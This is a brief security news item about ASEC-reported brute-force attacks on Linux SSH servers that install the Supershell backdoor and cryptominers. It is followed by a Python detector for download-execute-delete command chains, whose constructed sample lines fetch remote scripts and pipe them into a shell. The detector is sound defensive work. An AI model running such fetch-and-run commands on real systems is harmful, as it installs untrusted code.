SSH connection is a checkpoint for the entry of uninvited guests.
Researchers from ASEC have identified new attacks targeting poorly protected Linux SSH servers. In these attacks, the hackers used the Supershell malware, written in the Go language. This backdoor provides attackers with remote control over compromised systems.
After the initial infection, hackers run scanners to look for other vulnerable targets. It is assumed that these attacks are carried out using password dictionaries obtained from already infected servers.
Attackers use the wget, curl, tftp, and ftpget commands to download and execute malicious scripts. These scripts give the attackers full access to the system and let them install additional malware, and then hide the traces of the attack by deleting the downloaded files.
Once a backdoor is installed, hackers can set up hidden cryptocurrency miners such as XMRig on infected hosts, which is a typical attack scheme for vulnerable Linux servers. In the campaign under review, the hackers also used Cobalt Strike to set up remote access and ElfMiner to install cryptominers.
Experts recommend that administrators strengthen the protection of their systems, regularly update software, use complex passwords and enable firewalls to minimize the risk of infection.
Source
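A detection sketch for the download, execute and delete sequence described above, added here as an example and not taken from the ASEC report or the original post. It scores logged shell command lines; the sample lines are constructed, and the function names, severity labels and the list of interpreters are assumptions.

```python
import re
import shlex

DOWNLOADERS = {"wget", "curl", "tftp", "ftpget"}  # tools named in the article
INTERPRETERS = {"sh", "bash"}  # assumption: shells used to run the fetched script

# Constructed sample command lines (192.0.2.0/24 is a documentation range).
SAMPLE = [
    "cd /tmp; wget http://192.0.2.10/a.sh; chmod +x a.sh; ./a.sh; rm -f a.sh",
    "curl -s http://192.0.2.10/b.sh | sh",
    "busybox ftpget 192.0.2.10 c.sh c.sh && sh c.sh && rm c.sh",
    "wget https://example.org/release.tar.gz",
    "rm -rf /var/tmp/build",
]

def stages(line):
    """Return which of download / execute / delete appear in one logged line."""
    found = set()
    # Simplification: split on ; && || | without honouring shell quoting.
    for cmd in re.split(r";|&&|\|\||\|", line):
        try:
            argv = shlex.split(cmd)
        except ValueError:  # unbalanced quotes: fall back to whitespace split
            argv = cmd.split()
        # ftpget and tftp are often BusyBox applets; unwrap "busybox <applet>".
        if argv and argv[0].rsplit("/", 1)[-1] == "busybox":
            argv = argv[1:]
        if not argv:
            continue
        prog = argv[0].rsplit("/", 1)[-1]
        if prog in DOWNLOADERS:
            found.add("download")
        elif prog in INTERPRETERS or argv[0].startswith("./"):
            found.add("execute")
        elif prog == "rm":
            found.add("delete")
    return found

def severity(line):
    """high: fetch + run + cleanup on one line; medium: fetch + run; else none."""
    seen = stages(line)
    if {"download", "execute"} <= seen:
        return "high" if "delete" in seen else "medium"
    return "none"

def triage(lines):
    """Keep only the lines worth an analyst's attention, with their severity."""
    return [(severity(l), l) for l in lines if severity(l) != "none"]

if __name__ == "__main__":
    for level, line in triage(SAMPLE):
        print(f"[{level}] {line}")
```

Feed it command lines from process-execution logging or shell history; a plain download or a plain `rm` on its own is not flagged.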